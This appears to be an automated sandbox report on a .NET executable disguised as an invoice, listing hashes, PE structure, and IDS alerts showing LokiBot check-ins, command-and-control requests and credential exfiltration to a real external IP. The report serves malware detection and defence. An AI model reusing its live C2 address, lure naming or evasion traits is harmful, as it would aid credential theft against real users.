                                SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                Malicious:true
                                Reputation:high, very likely benign file
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                Process:C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:1
                                Process:C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                File Type:data
                                Category:dropped
                                Size (bytes):46
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3::
                                MD5:D898504A722BFF1524134C6AB6A5EAA5
                                SHA1:E0FDC90C2CA2A0219C99D2758E68C18875A3E11E
                                SHA-256:878F32F76B159494F5A39F9321616C6068CDB82E88DF89BCC739BBC1EA78E1F9
                                SHA-512:26A4398BFFB0C0AEF9A6EC53CD3367A2D0ABF2F70097F711BBBF1E9E32FD9F1A72121691BB6A39EEB55D596EDD527934E541B4DEFB3B1426B1D1A6429804DC61
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:..............................................
                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.565543571702018
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Windows Screen Saver (13104/52) 0.07%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                File name:INV.2022LB0362 FORM CO (2).exe
                                File size:865280
                                MD5:baed30aea51e6000571219633aa745b0
                                SHA1:d7e3b155c00245a7f867dd2fb4c06cb7be6ec3f7
                                SHA256:57520e51bb0820741b7883926800223886c491a8a5ddd517a49b0e2cc752fb18
                                SHA512:4f19e423fc1bdbba152a570e5382bd2eabdf04ca335cdc1ed286287740c153c7a34d3a661abaf01f124870f9bd3de2e9321e66114f5bedea16131bd77de2b786
                                SSDEEP:24576:GM+L74mBfNUstzoB1ERZcSMI2PmVl9kiYxM9aE3r8JN:F+RiSMHmgu9HI
                                TLSH:91054A4F2B7FDEF0EA245CFB221457039D3651DABA8BCA7883984BC660F161C5B74864
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k................0..*..........vH... ...`....@.. ....................................@................................
                                Icon Hash:00828e8e8686b000
                                Entrypoint:0x4d4876
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0xDBD76B81 [Sat Nov 16 23:34:25 2086 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0xd48240x4f.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xd60000x5cc.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xd80000xc.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0xd48080x1c.text
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x20000xd287c0xd2a00False0.8132742952522255data7.568253289628953IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rsrc0xd60000x5cc0x600False0.4264322916666667data4.114856973981248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0xd80000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                NameRVASizeTypeLanguageCountry
                                RT_VERSION0xd60900x33cdata
                                RT_MANIFEST0xd63dc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                DLLImport
                                mscoree.dll_CorExeMain
                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                192.168.2.395.213.216.20249705802024318 11/30/22-00:54:20.168790TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970580192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249702802021641 11/30/22-00:54:14.871390TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970280192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249738802024313 11/30/22-00:55:23.450513TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973880192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249734802825766 11/30/22-00:55:16.065951TCP2825766ETPRO TROJAN LokiBot Checkin M24973480192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497272025483 11/30/22-00:55:04.982566TCP2025483ET TROJAN LokiBot Fake 404 Response804972795.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249741802024313 11/30/22-00:55:29.247109TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974180192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249701802825766 11/30/22-00:54:12.581436TCP2825766ETPRO TROJAN LokiBot Checkin M24970180192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249749802025381 11/30/22-00:55:43.976237TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249759802825766 11/30/22-00:56:01.042444TCP2825766ETPRO TROJAN LokiBot Checkin M24975980192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249738802024318 11/30/22-00:55:23.450513TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973880192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249735802021641 11/30/22-00:55:17.863854TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973580192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249705802024313 11/30/22-00:54:20.168790TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970580192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249741802024318 11/30/22-00:55:29.247109TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974180192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497232025483 11/30/22-00:54:57.894669TCP2025483ET TROJAN LokiBot Fake 404 Response804972395.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249752802025381 11/30/22-00:55:49.378987TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249716802025381 11/30/22-00:54:43.829219TCP2025381ET TROJAN LokiBot Checkin4971680192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249707802021641 11/30/22-00:54:24.716724TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970780192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249757802025381 11/30/22-00:55:58.948901TCP2025381ET TROJAN LokiBot Checkin4975780192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249730802021641 11/30/22-00:55:08.823725TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973080192.168.2.395.213.216.202
                                192.168.2.38.8.8.861416532014169 11/30/22-00:55:12.379224UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6141653192.168.2.38.8.8.8
                                192.168.2.38.8.8.860088532014169 11/30/22-00:55:21.529314UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6008853192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249713802024313 11/30/22-00:54:37.979213TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971380192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249726802825766 11/30/22-00:55:01.673863TCP2825766ETPRO TROJAN LokiBot Checkin M24972680192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249713802024318 11/30/22-00:54:37.979213TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971380192.168.2.395.213.216.202
                                192.168.2.38.8.8.857743532014169 11/30/22-00:55:08.735474UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5774353192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249754802825766 11/30/22-00:55:53.496270TCP2825766ETPRO TROJAN LokiBot Checkin M24975480192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497572025483 11/30/22-00:55:59.773200TCP2025483ET TROJAN LokiBot Fake 404 Response804975795.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249744802025381 11/30/22-00:55:34.401351TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.395.213.216.202
                                192.168.2.38.8.8.859820532014169 11/30/22-00:55:29.162121UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5982053192.168.2.38.8.8.8
                                192.168.2.38.8.8.853305532014169 11/30/22-00:54:54.648302UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5330553192.168.2.38.8.8.8
                                95.213.216.202192.168.2.380497532025483 11/30/22-00:55:52.887247TCP2025483ET TROJAN LokiBot Fake 404 Response804975395.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249708802025381 11/30/22-00:54:26.803652TCP2025381ET TROJAN LokiBot Checkin4970880192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497162025483 11/30/22-00:54:45.204539TCP2025483ET TROJAN LokiBot Fake 404 Response804971695.213.216.202192.168.2.3
                                95.213.216.202192.168.2.380497382025483 11/30/22-00:55:24.982216TCP2025483ET TROJAN LokiBot Fake 404 Response804973895.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249758802024313 11/30/22-00:56:00.034214TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249755802021641 11/30/22-00:55:55.653974TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497302025483 11/30/22-00:55:10.337695TCP2025483ET TROJAN LokiBot Fake 404 Response804973095.213.216.202192.168.2.3
                                95.213.216.202192.168.2.380497342025483 11/30/22-00:55:17.565495TCP2025483ET TROJAN LokiBot Fake 404 Response804973495.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249758802024318 11/30/22-00:56:00.034214TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975880192.168.2.395.213.216.202
                                192.168.2.38.8.8.852387532014169 11/30/22-00:54:14.412323UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5238753192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249721802024318 11/30/22-00:54:53.572062TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972180192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249727802021641 11/30/22-00:55:03.486766TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972780192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249750802021641 11/30/22-00:55:45.758418TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497122025483 11/30/22-00:54:37.552263TCP2025483ET TROJAN LokiBot Fake 404 Response804971295.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249718802825766 11/30/22-00:54:47.592007TCP2825766ETPRO TROJAN LokiBot Checkin M24971880192.168.2.395.213.216.202
                                192.168.2.38.8.8.851992532014169 11/30/22-00:55:36.286012UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5199253192.168.2.38.8.8.8
                                192.168.2.38.8.8.860625532014169 11/30/22-00:54:18.863516UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6062553192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249736802025381 11/30/22-00:55:19.643476TCP2025381ET TROJAN LokiBot Checkin4973680192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249721802024313 11/30/22-00:54:53.572062TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972180192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249746802825766 11/30/22-00:55:38.275174TCP2825766ETPRO TROJAN LokiBot Checkin M24974680192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249722802021641 11/30/22-00:54:54.732179TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972280192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249699802025381 11/30/22-00:54:07.324934TCP2025381ET TROJAN LokiBot Checkin4969980192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249714802021641 11/30/22-00:54:39.977728TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971480192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497492025483 11/30/22-00:55:45.483574TCP2025483ET TROJAN LokiBot Fake 404 Response804974995.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249712802025381 11/30/22-00:54:35.972913TCP2025381ET TROJAN LokiBot Checkin4971280192.168.2.395.213.216.202
                                192.168.2.38.8.8.857840532014169 11/30/22-00:54:09.401173UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5784053192.168.2.38.8.8.8
                                192.168.2.38.8.8.858301532014169 11/30/22-00:55:42.001541UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5830153192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249740802025381 11/30/22-00:55:27.193434TCP2025381ET TROJAN LokiBot Checkin4974080192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497422025483 11/30/22-00:55:32.668199TCP2025483ET TROJAN LokiBot Fake 404 Response804974295.213.216.202192.168.2.3
                                192.168.2.38.8.8.863562532014169 11/30/22-00:55:23.368358UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6356253192.168.2.38.8.8.8
                                95.213.216.202192.168.2.380497412025483 11/30/22-00:55:30.821604TCP2025483ET TROJAN LokiBot Fake 404 Response804974195.213.216.202192.168.2.3
                                192.168.2.38.8.8.850784532014169 11/30/22-00:55:55.557056UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5078453192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249723802021641 11/30/22-00:54:56.463103TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972380192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249713802825766 11/30/22-00:54:37.979213TCP2825766ETPRO TROJAN LokiBot Checkin M24971380192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249726802024313 11/30/22-00:55:01.673863TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972680192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249728802025381 11/30/22-00:55:05.285201TCP2025381ET TROJAN LokiBot Checkin4972880192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249726802024318 11/30/22-00:55:01.673863TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972680192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249737802025381 11/30/22-00:55:21.614296TCP2025381ET TROJAN LokiBot Checkin4973780192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497112025483 11/30/22-00:54:35.462242TCP2025483ET TROJAN LokiBot Fake 404 Response804971195.213.216.202192.168.2.3
                                192.168.2.38.8.8.856949532014169 11/30/22-00:54:59.841953UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5694953192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249753802024318 11/30/22-00:55:51.242717TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975380192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249753802024313 11/30/22-00:55:51.242717TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975380192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497082025483 11/30/22-00:54:28.382639TCP2025483ET TROJAN LokiBot Fake 404 Response804970895.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249714802825766 11/30/22-00:54:39.977728TCP2825766ETPRO TROJAN LokiBot Checkin M24971480192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249725802024313 11/30/22-00:54:59.930841TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972580192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249756802025381 11/30/22-00:55:57.533680TCP2025381ET TROJAN LokiBot Checkin4975680192.168.2.395.213.216.202
                                192.168.2.38.8.8.860825532014169 11/30/22-00:55:59.940841UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6082553192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249754802024313 11/30/22-00:55:53.496270TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975480192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249748802021641 11/30/22-00:55:42.098367TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974880192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249725802024318 11/30/22-00:54:59.930841TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972580192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249742802021641 11/30/22-00:55:31.101064TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249755802825766 11/30/22-00:55:55.653974TCP2825766ETPRO TROJAN LokiBot Checkin M24975580192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249754802024318 11/30/22-00:55:53.496270TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975480192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249709802025381 11/30/22-00:54:29.164231TCP2025381ET TROJAN LokiBot Checkin4970980192.168.2.395.213.216.202
                                192.168.2.38.8.8.849977532014169 11/30/22-00:54:06.875981UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related4997753192.168.2.38.8.8.8
                                192.168.2.38.8.8.856924532014169 11/30/22-00:54:16.879287UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5692453192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249700802024317 11/30/22-00:54:09.487691TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24970080192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249739802825766 11/30/22-00:55:25.267085TCP2825766ETPRO TROJAN LokiBot Checkin M24973980192.168.2.395.213.216.202
                                192.168.2.38.8.8.860582532014169 11/30/22-00:54:28.778637UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6058253192.168.2.38.8.8.8
                                95.213.216.202192.168.2.380497192025483 11/30/22-00:54:51.280995TCP2025483ET TROJAN LokiBot Fake 404 Response804971995.213.216.202192.168.2.3
                                192.168.2.38.8.8.864595532014169 11/30/22-00:55:31.020256UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6459553192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249742802825766 11/30/22-00:55:31.101064TCP2825766ETPRO TROJAN LokiBot Checkin M24974280192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249700802024312 11/30/22-00:54:09.487691TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14970080192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249711802025381 11/30/22-00:54:33.859062TCP2025381ET TROJAN LokiBot Checkin4971180192.168.2.395.213.216.202
                                192.168.2.38.8.8.860767532014169 11/30/22-00:54:45.460012UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6076753192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249739802021641 11/30/22-00:55:25.267085TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973980192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249724802025381 11/30/22-00:54:58.184483TCP2025381ET TROJAN LokiBot Checkin4972480192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249751802021641 11/30/22-00:55:47.279515TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975180192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249758802825766 11/30/22-00:56:00.034214TCP2825766ETPRO TROJAN LokiBot Checkin M24975880192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249710802021641 11/30/22-00:54:31.910937TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971080192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249711802021641 11/30/22-00:54:33.859062TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971180192.168.2.395.213.216.202
                                192.168.2.38.8.8.849201532014169 11/30/22-00:56:00.958664UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related4920153192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249729802024313 11/30/22-00:55:07.068054TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972980192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249758802025381 11/30/22-00:56:00.034214TCP2025381ET TROJAN LokiBot Checkin4975880192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497262025483 11/30/22-00:55:03.204141TCP2025483ET TROJAN LokiBot Fake 404 Response804972695.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249743802025381 11/30/22-00:55:32.962709TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249729802024318 11/30/22-00:55:07.068054TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972980192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249744802021641 11/30/22-00:55:34.401351TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249726802021641 11/30/22-00:55:01.673863TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972680192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249750802024313 11/30/22-00:55:45.758418TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249710802825766 11/30/22-00:54:31.910937TCP2825766ETPRO TROJAN LokiBot Checkin M24971080192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497222025483 11/30/22-00:54:56.166551TCP2025483ET TROJAN LokiBot Fake 404 Response804972295.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249750802024318 11/30/22-00:55:45.758418TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975080192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249699802021641 11/30/22-00:54:07.324934TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4969980192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497202025483 11/30/22-00:54:53.259308TCP2025483ET TROJAN LokiBot Fake 404 Response804972095.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249701802021641 11/30/22-00:54:12.581436TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970180192.168.2.395.213.216.202
                                192.168.2.38.8.8.853623532014169 11/30/22-00:55:10.547934UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5362353192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249754802021641 11/30/22-00:55:53.496270TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975480192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249715802025381 11/30/22-00:54:42.060768TCP2025381ET TROJAN LokiBot Checkin4971580192.168.2.395.213.216.202
                                192.168.2.38.8.8.852955532014169 11/30/22-00:54:26.705694UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5295553192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249740802024313 11/30/22-00:55:27.193434TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974080192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249740802024318 11/30/22-00:55:27.193434TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974080192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249738802025381 11/30/22-00:55:23.450513TCP2025381ET TROJAN LokiBot Checkin4973880192.168.2.395.213.216.202
